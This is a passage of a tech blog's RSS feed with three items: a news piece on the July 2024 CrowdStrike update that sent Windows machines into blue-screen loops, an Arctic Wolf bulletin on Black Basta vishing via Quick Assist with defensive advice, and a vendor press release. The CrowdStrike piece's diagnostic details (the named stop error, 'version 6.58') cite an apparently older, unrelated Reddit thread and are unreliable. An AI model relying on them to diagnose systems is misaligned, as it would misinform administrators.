<figure class="wp-block-image size-full"><img src="data:image/svg+xml,%3Csvg%20xmlns=%27http://www.w3.org/2000/svg%27%20width='690'%20height='388'%20viewBox=%270%200%20690%20388%27%3E%3C/svg%3E" loading="lazy" data-lazy="1" style="background:linear-gradient(to right,#5fc53d 25%,#5fc53d 25% 50%,#5fc53d 50% 75%,#5fc53d 75%),linear-gradient(to right,#61c340 25%,#5dc43f 25% 50%,#60c63c 50% 75%,#60c63b 75%),linear-gradient(to right,#5fc53d 25%,#60c63b 25% 50%,#60c63b 50% 75%,#60c63b 75%),linear-gradient(to right,#5fc53d 25%,#60c63b 25% 50%,#60c63b 50% 75%,#60c63b 75%)" decoding="async" width="690" height="388" data-tf-src="https://www.ervik.as/wp-content/uploads/2024/07/crowdstrike-microsoft-blue-screen-of-death-16x9-1.avif" alt="Crowdstrike update causes major issues around the whole world" class="tf_svg_lazy wp-image-28686" data-tf-srcset="https://www.ervik.as/wp-content/uploads/2024/07/crowdstrike-microsoft-blue-screen-of-death-16x9-1.avif 690w, https://www.ervik.as/wp-content/uploads/2024/07/crowdstrike-microsoft-blue-screen-of-death-16x9-1-300x169.avif 300w" data-tf-sizes="(max-width: 690px) 100vw, 690px" /><noscript><img decoding="async" width="690" height="388" data-tf-not-load src="https://www.ervik.as/wp-content/uploads/2024/07/crowdstrike-microsoft-blue-screen-of-death-16x9-1.avif" alt="Crowdstrike update causes major issues around the whole world" class="wp-image-28686" srcset="https://www.ervik.as/wp-content/uploads/2024/07/crowdstrike-microsoft-blue-screen-of-death-16x9-1.avif 690w, https://www.ervik.as/wp-content/uploads/2024/07/crowdstrike-microsoft-blue-screen-of-death-16x9-1-300x169.avif 300w" sizes="(max-width: 690px) 100vw, 690px" /></noscript></figure>



<h2 class="wp-block-heading">CrowdStrike Update Pushing Windows Machines Into a BSOD Loop.</h2>



<p><a href="https://www.crowdstrike.com/blog/statement-on-windows-sensor-update/" data-type="link" data-id="https://www.crowdstrike.com/blog/statement-on-windows-sensor-update/" target="_blank" rel="noopener">Crowdstrike</a>, a <a href="https://www.ervik.as/cyber-security-news/">cybersecurity</a> technology company that provides endpoint security, threat assessment and cyberattack response services, served up a very unfortunate update to Microsoft&#8217;s Windows 10 and 11 ecosystem. A recent update to the company´s Falcon sensor is causing major issues for Microsoft Windows users worldwide. This update is leading to blue screen of death (BSOD) loops and making systems inoperable.</p>



<p>The bottom line is that airports, banks, online websites, healthcare and the media (incl. traditional TV), to name a few, are struggling because the update created so much havoc that affected machines ended up with a complete stop in the form of the familiar BSOD / blue screen. Many flights have been grounded, with queues and delays at airports, while shops and communications have also been hit.</p>



<p>Microsoft has said it is taking &#8220;mitigation action&#8221; to deal with &#8220;the lingering impact&#8221; of the outage.</p>



<p>The issue, which began on July 19, 2024, affects Windows 10 and 11 systems running CrowdStrike’s endpoint security software. Users report experiencing repeated BSODs with the error message “DRIVER_OVERRAN_STACK_BUFFER,” which prevents normal system boot and operation<a href="https://www.reddit.com/r/sysadmin/comments/152iyhl/psa_crowdstrike_falcon_update_causing_bsod_loop/" target="_blank" rel="noreferrer noopener"></a>.<a href="https://go.cynet.com/3-security-trends-to-maximize-msp-growth?utm_source=cyber_security_news&amp;utm_medium=display_ad&amp;utm_campaign=Q3-sponsored-webinars" target="_blank" rel="noreferrer noopener"></a></p>



<p>More specifically, it is the Falcon Sensor software that is to blame for all the problems. The program is described by Crowdstrike as &#8220;blocking attacks on your systems while capturing and recording activity as it happens to detect threats quickly.&#8221;</p>



<p>Just before 12:00 CST+1, their CEO George Kurtz stepped <a href="https://x.com/George_Kurtz/status/1814235001745027317">out in a message on </a><a href="https://x.com/George_Kurtz/status/1814235001745027317" target="_blank" rel="noreferrer noopener">X</a>, where he writes that the company is &#8220;actively working to find solutions&#8221;. He points to an error for Windows users and says that the problems do not affect Mac or Linux.</p>



<p><strong>Statement on Windows Sensor Update</strong></p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>CrowdStrike is actively working with customers impacted by a defect found in a single content update for Windows hosts. Mac and Linux hosts are not impacted. This is not a security incident or cyberattack.&nbsp;</p>



<p>The issue has been identified, isolated and a fix has been deployed. We refer customers to the support portal for the latest updates and will continue to provide complete and continuous updates on our website.&nbsp;</p>



<p>We further recommend organizations ensure they’re communicating with CrowdStrike representatives through official channels.&nbsp;</p>



<p>Our team is fully mobilized to ensure the security and stability of CrowdStrike customers.</p>
</blockquote>



<p>The data problems first reported in Australia are related to a security update. <br>Crowdstrike is reporting that they have fixed the bug with the updates Computer security company Crowdstrike reports that the problem that caused global IT problems on Friday has been identified and isolated, and a fix has been implemented.<br>The serious IT problems affect many large international companies, including airports, banks and websites worldwide. The problems also affect a number of Norwegian businesses.</p>



<p>The incident is referred to as the biggest IT collapse in history.</p>



<h2 class="wp-block-heading" id="h-how-to-check-crowdstrike-sensor-version-is-affected-by-the-bsod-issue"><strong>How to Check CrowdStrike sensor version is affected by the BSOD issue</strong></h2>



<ol class="wp-block-list">
<li><strong>Identify your sensor version:<br></strong>Boot into Safe Mode and check the CrowdStrike Falcon sensor version installed on your system. The problematic update seems to be affecting various sensor versions, including version 6.58<a href="https://www.reddit.com/r/sysadmin/comments/152iyhl/psa_crowdstrike_falcon_update_causing_bsod_loop/" target="_blank" rel="noreferrer noopener"></a>.</li>



<li><strong>Check the installation date:<br></strong>Look at the installation date of the CrowdStrike Falcon sensor. If it coincides with the onset of BSOD issues (around July 19, 2024), it’s likely to be the cause<a href="https://www.reddit.com/r/sysadmin/comments/152iyhl/psa_crowdstrike_falcon_update_causing_bsod_loop/" target="_blank" rel="noreferrer noopener"></a>.</li>



<li><strong>Look for specific error messages:<br></strong>The BSOD error associated with this issue is “DRIVER_OVERRAN_STACK_BUFFER”. If you’re seeing this error, your system is likely affected<a href="https://www.reddit.com/r/sysadmin/comments/152iyhl/psa_crowdstrike_falcon_update_causing_bsod_loop/" target="_blank" rel="noreferrer noopener"></a>.</li>
</ol>



<h2 class="wp-block-heading">How to fix the Crowdstrike bug (<strong>Possible Workarounds</strong>)</h2>



<ol class="wp-block-list">
<li>Start Windows in Safe Mode or open the Windows Recovery Environment</li>



<li>Navigate to C:\Windows\System32\drivers\CrowdStrike</li>



<li>Find the file “C-00000291*.sys” and delete it</li>



<li>Restart the machine</li>
</ol>



<p>And according to those in the know, the fix will probably have to be applied separately to each and every device affected &#8211; causing a massive headache for IT departments everywhere around the world.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Black Basta Ransomware Group Affiliates Leveraging Windows Quick Assist for Initial Access</title>
		<link>https://www.ervik.as/black-basta-ransomware-group-affiliates-leveraging-windows-quick-assist-for-initial-access/</link>
		
		<dc:creator><![CDATA[Alexander Ervik Johnsen]]></dc:creator>
		<pubDate>Wed, 26 Jun 2024 15:47:13 +0000</pubDate>
				<category><![CDATA[Arctic Wolf]]></category>
		<category><![CDATA[Cyber Security]]></category>
		<category><![CDATA[Cyber Security News]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Windows 10]]></category>
		<category><![CDATA[cobalt strike]]></category>
		<category><![CDATA[MDR]]></category>
		<category><![CDATA[Microsoft Teams]]></category>
		<category><![CDATA[qakbot]]></category>
		<category><![CDATA[Quick Assist]]></category>
		<category><![CDATA[Ransomware]]></category>
		<category><![CDATA[RMM Tools]]></category>
		<category><![CDATA[soc]]></category>
		<category><![CDATA[Windows]]></category>
		<guid isPermaLink="false">https://www.ervik.as/?p=27696</guid>

					<description><![CDATA[Since April 2024, Arctic Wolf has been tracking an ongoing campaign by Black Basta ransomware group affiliates leveraging Microsoft´s Windows Quick Assist for initial access. The Black Basta affiliates have been conducting vishing (voice phishing) attacks by impersonating IT or help desk personnel, claiming they need to fix an issue on the victim’s device. In [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fwww.ervik.as%2Fblack-basta-ransomware-group-affiliates-leveraging-windows-quick-assist-for-initial-access%2F&amp;linkname=Black%20Basta%20Ransomware%20Group%20Affiliates%20Leveraging%20Windows%20Quick%20Assist%20for%20Initial%20Access" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_bluesky" href="https://www.addtoany.com/add_to/bluesky?linkurl=https%3A%2F%2Fwww.ervik.as%2Fblack-basta-ransomware-group-affiliates-leveraging-windows-quick-assist-for-initial-access%2F&amp;linkname=Black%20Basta%20Ransomware%20Group%20Affiliates%20Leveraging%20Windows%20Quick%20Assist%20for%20Initial%20Access" title="Bluesky" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fwww.ervik.as%2Fblack-basta-ransomware-group-affiliates-leveraging-windows-quick-assist-for-initial-access%2F&amp;linkname=Black%20Basta%20Ransomware%20Group%20Affiliates%20Leveraging%20Windows%20Quick%20Assist%20for%20Initial%20Access" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Fwww.ervik.as%2Fblack-basta-ransomware-group-affiliates-leveraging-windows-quick-assist-for-initial-access%2F&amp;linkname=Black%20Basta%20Ransomware%20Group%20Affiliates%20Leveraging%20Windows%20Quick%20Assist%20for%20Initial%20Access" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fwww.ervik.as%2Fblack-basta-ransomware-group-affiliates-leveraging-windows-quick-assist-for-initial-access%2F&amp;linkname=Black%20Basta%20Ransomware%20Group%20Affiliates%20Leveraging%20Windows%20Quick%20Assist%20for%20Initial%20Access" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fwww.ervik.as%2Fblack-basta-ransomware-group-affiliates-leveraging-windows-quick-assist-for-initial-access%2F&amp;linkname=Black%20Basta%20Ransomware%20Group%20Affiliates%20Leveraging%20Windows%20Quick%20Assist%20for%20Initial%20Access" title="Email" rel="nofollow noopener" target="_blank"></a></p>
<figure class="wp-block-image size-large"><img src="data:image/svg+xml,%3Csvg%20xmlns=%27http://www.w3.org/2000/svg%27%20width='1024'%20height='576'%20viewBox=%270%200%201024%20576%27%3E%3C/svg%3E" loading="lazy" data-lazy="1" decoding="async" width="1024" height="576" data-tf-src="http://www.ervik.as/wp-content/uploads/2023/10/Latest_CyberSecurity_news-1024x576.jpg" alt="Windows Quick Assist" class="tf_svg_lazy wp-image-18917" data-tf-srcset="https://www.ervik.as/wp-content/uploads/2023/10/Latest_CyberSecurity_news-1024x576.jpg 1024w, https://www.ervik.as/wp-content/uploads/2023/10/Latest_CyberSecurity_news-300x169.jpg 300w, https://www.ervik.as/wp-content/uploads/2023/10/Latest_CyberSecurity_news-768x432.jpg 768w, https://www.ervik.as/wp-content/uploads/2023/10/Latest_CyberSecurity_news.jpg 1400w" data-tf-sizes="(max-width: 1024px) 100vw, 1024px" /><noscript><img decoding="async" width="1024" height="576" data-tf-not-load src="http://www.ervik.as/wp-content/uploads/2023/10/Latest_CyberSecurity_news-1024x576.jpg" alt="Windows Quick Assist" class="wp-image-18917" srcset="https://www.ervik.as/wp-content/uploads/2023/10/Latest_CyberSecurity_news-1024x576.jpg 1024w, https://www.ervik.as/wp-content/uploads/2023/10/Latest_CyberSecurity_news-300x169.jpg 300w, https://www.ervik.as/wp-content/uploads/2023/10/Latest_CyberSecurity_news-768x432.jpg 768w, https://www.ervik.as/wp-content/uploads/2023/10/Latest_CyberSecurity_news.jpg 1400w" sizes="(max-width: 1024px) 100vw, 1024px" /></noscript></figure>



<p>Since April 2024, Arctic Wolf has been tracking an ongoing campaign by Black Basta ransomware group affiliates leveraging Microsoft´s Windows Quick Assist for initial access. The Black Basta affiliates have been conducting vishing (voice phishing) attacks by impersonating IT or help desk personnel, claiming they need to fix an issue on the victim’s device. In other instances, the threat actors leverage an email bomb attack to flood the victim’s mailbox with emails from subscription services. They then call the victim, impersonating IT support, and offer assistance in resolving the issue. In both scenarios, the threat actors persuade the victim to provide access through Quick Assist by entering a security code and granting permissions to control their device. </p>



<p>Once given remote access, the threat actors execute scripts with cURL commands to download batch or ZIP files, delivering malicious payloads such as Qakbot, ScreenConnect, NetSupport Manager, and Cobalt Strike. Establishing persistence with these tools, the threat actors proceed with the attack chain, including domain enumeration, lateral movement, and using PsExec to deploy Black Basta ransomware throughout the environment.&nbsp;</p>



<h3 class="wp-block-heading">Additional Initial Access Tactic: Microsoft Teams</h3>



<p>On June 12, 2024, Microsoft <a href="https://www.microsoft.com/en-us/security/blog/2024/05/15/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware/" target="_blank" rel="noreferrer noopener">revealed</a> that in late May, Black Basta affiliates were observed using Microsoft Teams to reach target users. The threat actors used Teams to send messages and make calls, pretending to be IT or help desk staff. This tactic results in the misuse of Windows Quick Assist, credential theft through EvilProxy, execution of batch scripts, and deployment of SystemBC for maintaining persistence and controlling compromised systems. Given Microsoft Teams’ widespread adoption in enterprise systems globally, this new attack vector observed in this campaign poses a significant risk to organizations. </p>



<h3 class="wp-block-heading">Detections for Campaign TTPs</h3>



<p>Arctic Wolf has multiple detections in place that identify many of the Tactics, Techniques, and Procedures (TTPs) currently utilized in this campaign by the threat actors. These include detections for email bombing, remote access software, and tools for ingress.&nbsp;</p>



<p>Additionally, Arctic Wolf has agent-based detections in place for relevant tooling across several other TTPs including credential access, discovery, and reconnaissance that have been observed to be associated with Black Basta connected activity in the past.&nbsp;&nbsp;</p>



<p>Customers can expect tickets from the <a href="https://www.ervik.as/soc/arctic-wolf/">Arctic Wolf</a> SOC for any malicious activity detected surrounding the campaign TTPs.</p>



<h2 class="wp-block-heading"><strong>Recommendations</strong>&nbsp;</h2>



<h3 class="wp-block-heading">Recommendation #1: Uninstall Windows Quick Assist and/or Other RMM Tools if Not Utilized in Your Environment</h3>



<p>If your organization does not utilize Windows Quick Assist and/or any other remote support tools, Arctic Wolf <strong>strongly recommends</strong> disable or uninstall them. This prevents external threat actors from exploiting these tools to gain unauthorized access to your devices. </p>



<ul class="wp-block-list">
<li>Disabling Windows Quick Assist </li>



<li>To disable Windows Quick Assist, block traffic to the <a href="https://remoteassistance.support.services.microsoft.com/" target="_blank" rel="noreferrer noopener">https://remoteassistance.support.services.microsoft.com</a>endpoint. This is the primary endpoint used by Quick Assist to establish a session, and once blocked, Quick Assist can’t be used to get help or help someone. </li>



<li>Uninstalling Quick Assist </li>



<li>Uninstall via powershell – Run the following PowerShell command as Administrator: </li>



<li>Get-AppxPackage -Name MicrosoftCorporationII.QuickAssist | Remove-AppxPackage -AllUsers </li>



<li>Uninstall via Windows Settings </li>



<li>Navigate to Settings > Apps > Installed apps > Quick Assist > select the ellipsis (…), then select Uninstall. </li>
</ul>



<p>Additionally, consider implementing policies to block the installation and use of Windows Quick Assist and other RMM tools unless they have been explicitly approved for use within your environment. This approach helps ensure that only vetted and secure tools are in operation, further safeguarding your systems. </p>



<h3 class="wp-block-heading">Recommendation #2: Implement Comprehensive Security Awareness Training</h3>



<p>Black Basta affiliates have successfully socially engineered victims through calls and emails during this ongoing campaign. Arctic Wolf&nbsp;<strong>strongly recommends</strong>&nbsp;implementing comprehensive security awareness training campaigns. These initiatives are designed to equip users with the skills needed to quickly identify and report suspicious activities, including observed tech support scams in this campaign.&nbsp;</p>



<p>Arctic Wolf has several vishing modules within our&nbsp;<a href="https://arcticwolf.com/solutions/managed-security-awareness/" target="_blank" rel="noopener">Managed Security Awareness (MSA)</a>&nbsp;product that will help users identify the suspicious activity outlined in this bulletin.&nbsp;</p>



<h3 class="wp-block-heading">Recommendation #3: Microsoft Teams Attack Vector Safeguards</h3>



<p>Microsoft has provided the following mitigations to protect against attacks leveraging Microsoft Teams:&nbsp;</p>



<ul class="wp-block-list">
<li>Educate Microsoft Teams users to check for the ‘External’ tag on communications from external sources, exercise caution in sharing information, and avoid sharing account details or approving sign-in requests via chat. </li>



<li>Apply Microsoft’s <a href="https://learn.microsoft.com/MicrosoftTeams/teams-security-best-practices-for-safer-messaging?ocid=magicti_ta_learndoc" target="_blank" rel="noreferrer noopener">security best practices for Microsoft Teams</a>. </li>
</ul>



<p><a href="https://arcticwolf.com/resources/blog/black-basta-ransomware-group-affiliates-leveraging-windows-quick-assist-initial-access/" target="_blank" data-type="link" data-id="https://arcticwolf.com/resources/blog/black-basta-ransomware-group-affiliates-leveraging-windows-quick-assist-initial-access/" rel="noreferrer noopener">Learn more here</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Arctic Wolf adds Enhanced Identity Threat Detection and Response Capabilities to their MDR and SOC</title>
		<link>https://www.ervik.as/arctic-wolf-adds-enhanced-identity-threat-detection-and-response-capabilities-to-their-mdr-and-soc/</link>
					<comments>https://www.ervik.as/arctic-wolf-adds-enhanced-identity-threat-detection-and-response-capabilities-to-their-mdr-and-soc/#comments</comments>
		
		<dc:creator><![CDATA[Alexander Ervik Johnsen]]></dc:creator>
		<pubDate>Tue, 18 Jun 2024 07:33:44 +0000</pubDate>
				<category><![CDATA[Arctic Wolf]]></category>
		<category><![CDATA[SOC]]></category>
		<category><![CDATA[Gartner]]></category>
		<category><![CDATA[ITDR]]></category>
		<category><![CDATA[MDR]]></category>
		<category><![CDATA[microsoft defender]]></category>
		<category><![CDATA[Okta]]></category>
		<category><![CDATA[SIEM]]></category>
		<category><![CDATA[SOAR]]></category>
		<category><![CDATA[soc]]></category>
		<category><![CDATA[XDR]]></category>
		<guid isPermaLink="false">https://www.ervik.as/?p=27343</guid>

					<description><![CDATA[Arctic Wolf, a global leader in security operations, has announced the addition of identity threat detection and response (ITDR) enhancements to Arctic Wolf Managed Detection and Response ( MDR ), enabling businesses to further fortify their environments against evolving threats with new active response capabilities and integrations for Microsoft Defender for Identity and Okta. As [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-adds-enhanced-identity-threat-detection-and-response-capabilities-to-their-mdr-and-soc%2F&amp;linkname=Arctic%20Wolf%20adds%20Enhanced%20Identity%20Threat%20Detection%20and%20Response%20Capabilities%20to%20their%20MDR%20and%20SOC" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_bluesky" href="https://www.addtoany.com/add_to/bluesky?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-adds-enhanced-identity-threat-detection-and-response-capabilities-to-their-mdr-and-soc%2F&amp;linkname=Arctic%20Wolf%20adds%20Enhanced%20Identity%20Threat%20Detection%20and%20Response%20Capabilities%20to%20their%20MDR%20and%20SOC" title="Bluesky" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-adds-enhanced-identity-threat-detection-and-response-capabilities-to-their-mdr-and-soc%2F&amp;linkname=Arctic%20Wolf%20adds%20Enhanced%20Identity%20Threat%20Detection%20and%20Response%20Capabilities%20to%20their%20MDR%20and%20SOC" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-adds-enhanced-identity-threat-detection-and-response-capabilities-to-their-mdr-and-soc%2F&amp;linkname=Arctic%20Wolf%20adds%20Enhanced%20Identity%20Threat%20Detection%20and%20Response%20Capabilities%20to%20their%20MDR%20and%20SOC" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-adds-enhanced-identity-threat-detection-and-response-capabilities-to-their-mdr-and-soc%2F&amp;linkname=Arctic%20Wolf%20adds%20Enhanced%20Identity%20Threat%20Detection%20and%20Response%20Capabilities%20to%20their%20MDR%20and%20SOC" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-adds-enhanced-identity-threat-detection-and-response-capabilities-to-their-mdr-and-soc%2F&amp;linkname=Arctic%20Wolf%20adds%20Enhanced%20Identity%20Threat%20Detection%20and%20Response%20Capabilities%20to%20their%20MDR%20and%20SOC" title="Email" rel="nofollow noopener" target="_blank"></a></p>
<figure class="wp-block-image size-full"><img src="data:image/svg+xml,%3Csvg%20xmlns=%27http://www.w3.org/2000/svg%27%20width='576'%20height='225'%20viewBox=%270%200%20576%20225%27%3E%3C/svg%3E" loading="lazy" data-lazy="1" decoding="async" width="576" height="225" data-tf-src="http://www.ervik.as/wp-content/uploads/2024/05/ArcticWolf-logo2.png" alt="Arctic Wolf adds Enhanced Identity Threat Detection and Response Capabilities to their MDR and SOC" class="tf_svg_lazy wp-image-25623" data-tf-srcset="https://www.ervik.as/wp-content/uploads/2024/05/ArcticWolf-logo2.png 576w, https://www.ervik.as/wp-content/uploads/2024/05/ArcticWolf-logo2-300x117.png 300w" data-tf-sizes="(max-width: 576px) 100vw, 576px" /><noscript><img decoding="async" width="576" height="225" data-tf-not-load src="http://www.ervik.as/wp-content/uploads/2024/05/ArcticWolf-logo2.png" alt="Arctic Wolf adds Enhanced Identity Threat Detection and Response Capabilities to their MDR and SOC" class="wp-image-25623" srcset="https://www.ervik.as/wp-content/uploads/2024/05/ArcticWolf-logo2.png 576w, https://www.ervik.as/wp-content/uploads/2024/05/ArcticWolf-logo2-300x117.png 300w" sizes="(max-width: 576px) 100vw, 576px" /></noscript></figure>



<p>Arctic Wolf, a global leader in security operations, has announced the addition of identity threat detection and response (ITDR) enhancements to Arctic Wolf Managed Detection and Response ( MDR ), enabling businesses to further fortify their environments against evolving threats with new active response capabilities and integrations for Microsoft Defender for Identity and Okta.</p>



<p>As threat actors continue to target identity infrastructure with account compromise tactics such as credential stuffing, the ability to swiftly contain and mitigate identity risks at scale is critical in defending crucial data assets and protecting users. In 2023, 39% of incidents investigated by&nbsp;<a href="https://arcticwolf.com/resource/aw/arctic-wolf-labs-2024-threat-report" target="_blank" rel="noopener">Arctic Wolf Incident Response</a>&nbsp;were initiated via external remote access using compromised, legitimate credentials, underscoring the importance of ITDR capabilities as a core function of security operations, as opposed to a standalone XDR, SIEM, or SOAR solution. “Identity threat detection and response (ITDR) is emerging as a security operations center (SOC) function focus while IAM teams grapple with new tools to address enhancing detection of identity misuse,” according to Gartner® Research.<sup>1</sup></p>



<p><strong>The Arctic Wolf Platform updates include:</strong></p>



<ul class="wp-block-list">
<li>Active Response for Identity: New capabilities enable immediate action against threats in identity infrastructure, leveraging response actions to quickly disable impacted user accounts, revoking access to potentially sensitive information or systems and reducing risk for organizations.</li>



<li>Microsoft Defender for Identity Integration: New integration with Microsoft Defender for Identity to protect user identities and reduce attack surfaces, increasing visibility into identity infrastructure for earlier detection of identity-based attacks, including Business Email Compromise (BEC).</li>



<li>Okta Impossible Travel Detection: Expanded detection capabilities for the existing Okta integration that will enhance cross-attack surface coverage with detection of compromised accounts using indicators of compromise (IOC) based on velocity alerts from Okta.</li>
</ul>



<p>“As adversaries increase the use of identity-based attacks, the ability to integrate robust ITDR capabilities into security operations is critical in building business resilience, as containment and mitigation extends beyond the endpoint alone,” said Dan Schiappa, chief product and service officer, Arctic Wolf. “Effective cybersecurity hinges on detecting and remediating threats as quickly as possible. These new capabilities allow us to narrow the detection gap and minimize impact, effectively extinguishing and restricting adversarial account access more completely. As we continue to innovate on our world-class security operations platform, we are excited to continue to deliver on the security outcomes and resilience that have long been promised, yet underdelivered, by the security market at large.”</p>



<p>Through its cloud-native, AI-driven platform, <a href="https://www.ervik.as/soc/arctic-wolf/">Arctic Wolf</a> empowers organizations of almost any size to achieve security operations at the push of a button. Through hundreds of security and technology integrations available to customers today, the Arctic Wolf Security Operations Cloud ingests, parses, enriches, and analyzes more than 5.5 trillion security events per week from a global base of over 5,700 customers.</p>



<p>We believe that by being named the fastest growing vendor by revenue in 2023 according to Gartner® Market Share: Security Services, Worldwide, 2023 Research<sup>2</sup>, Arctic Wolf continues to entrench itself not only as a leading cybersecurity platform, but also as a transformative technology company. In the last 12 months, Arctic Wolf has been named to the&nbsp;<a href="https://arcticwolf.com/resources/press-releases/arctic-wolf-named-to-cnbc-disruptor-50-list-for-third-consecutive-year/" target="_blank" rel="noopener">CNBC Disruptor 50</a>&nbsp;for a third consecutive year, the&nbsp;<a href="https://arcticwolf.com/resources/press-releases/arctic-wolf-named-to-the-2023-forbes-cloud-100/" target="_blank" rel="noopener">Forbes Cloud 100</a>&nbsp;for a second consecutive year, and to the inaugural edition of the&nbsp;<a href="https://fortune.com/ranking/cyber/" target="_blank" rel="noopener">Fortune Cyber 60</a>. Additionally, the company was named&nbsp;<a href="https://arcticwolf.com/resources/press-releases/arctic-wolf-named-a-leader-in-2024-idc-marketscape-for-worldwide-managed-detection-and-response-services/" target="_blank" rel="noopener">a Leader in the 2024 IDC MarketScape for Worldwide Managed Detection and Response Services</a>. We were also&nbsp; recognized by our customers as a&nbsp;<a href="https://arcticwolf.com/resources/press-releases/arctic-wolf-recognized-in-managed-detection-and-response-market-with-a-customers-choice-distinction-from-gartner-peer-insights/" target="_blank" rel="noopener">Customers’ Choice&nbsp; for the North America region in the July 2023 Gartner Peer Insights<img loading="lazy" decoding="async" width="72" height="72" src="https://s.w.org/images/core/emoji/17.0.2/72x72/2122.png" alt="™" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Voice of the Customer for Managed Detection and Response</a>&nbsp;Services, and received the&nbsp;<a href="https://arcticwolf.com/resources/press-releases/arctic-wolf-recognized-by-customers-with-highest-overall-rating-and-willingness-to-recommend/" target="_blank" rel="noopener">highest overall rating&nbsp; and the highest Willingness to Recommend scores</a>&nbsp;in the January 2024 Gartner Peer Insights<img loading="lazy" decoding="async" width="72" height="72" src="https://s.w.org/images/core/emoji/17.0.2/72x72/2122.png" alt="™" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Voice of the Customer for Vulnerability Assessment.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.ervik.as/arctic-wolf-adds-enhanced-identity-threat-detection-and-response-capabilities-to-their-mdr-and-soc/feed/</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
			</item>
		<item>
		<title>Nutanix and NVIDIA Collaborate to Accelerate Enterprise AI Adoption</title>
		<link>https://www.ervik.as/nutanix-and-nvidia-collaborate-to-accelerate-enterprise-ai-adoption/</link>
		
		<dc:creator><![CDATA[Alexander Ervik Johnsen]]></dc:creator>
		<pubDate>Thu, 23 May 2024 13:14:04 +0000</pubDate>
				<category><![CDATA[Nutanix]]></category>
		<category><![CDATA[Nvidia]]></category>
		<category><![CDATA[AI]]></category>
		<category><![CDATA[GenAI]]></category>
		<guid isPermaLink="false">https://www.ervik.as/?p=26264</guid>

					<description><![CDATA[Nutanix and NVIDIA Collaborate to Accelerate Enterprise AI Adoption Nutanix has announced a collaboration with NVIDIA aimed at helping enterprises more easily adopt generative AI (GenAI). Through the integration of NVIDIA NIM inference microservices with Nutanix GPT-in-a-Box 2.0, customers will be able to build scalable, secure, high-performance GenAI applications across the enterprise and at the edge. Today, most [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fwww.ervik.as%2Fnutanix-and-nvidia-collaborate-to-accelerate-enterprise-ai-adoption%2F&amp;linkname=Nutanix%20and%20NVIDIA%20Collaborate%20to%20Accelerate%20Enterprise%20AI%20Adoption" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_bluesky" href="https://www.addtoany.com/add_to/bluesky?linkurl=https%3A%2F%2Fwww.ervik.as%2Fnutanix-and-nvidia-collaborate-to-accelerate-enterprise-ai-adoption%2F&amp;linkname=Nutanix%20and%20NVIDIA%20Collaborate%20to%20Accelerate%20Enterprise%20AI%20Adoption" title="Bluesky" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fwww.ervik.as%2Fnutanix-and-nvidia-collaborate-to-accelerate-enterprise-ai-adoption%2F&amp;linkname=Nutanix%20and%20NVIDIA%20Collaborate%20to%20Accelerate%20Enterprise%20AI%20Adoption" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Fwww.ervik.as%2Fnutanix-and-nvidia-collaborate-to-accelerate-enterprise-ai-adoption%2F&amp;linkname=Nutanix%20and%20NVIDIA%20Collaborate%20to%20Accelerate%20Enterprise%20AI%20Adoption" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fwww.ervik.as%2Fnutanix-and-nvidia-collaborate-to-accelerate-enterprise-ai-adoption%2F&amp;linkname=Nutanix%20and%20NVIDIA%20Collaborate%20to%20Accelerate%20Enterprise%20AI%20Adoption" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fwww.ervik.as%2Fnutanix-and-nvidia-collaborate-to-accelerate-enterprise-ai-adoption%2F&amp;linkname=Nutanix%20and%20NVIDIA%20Collaborate%20to%20Accelerate%20Enterprise%20AI%20Adoption" title="Email" rel="nofollow noopener" target="_blank"></a></p>
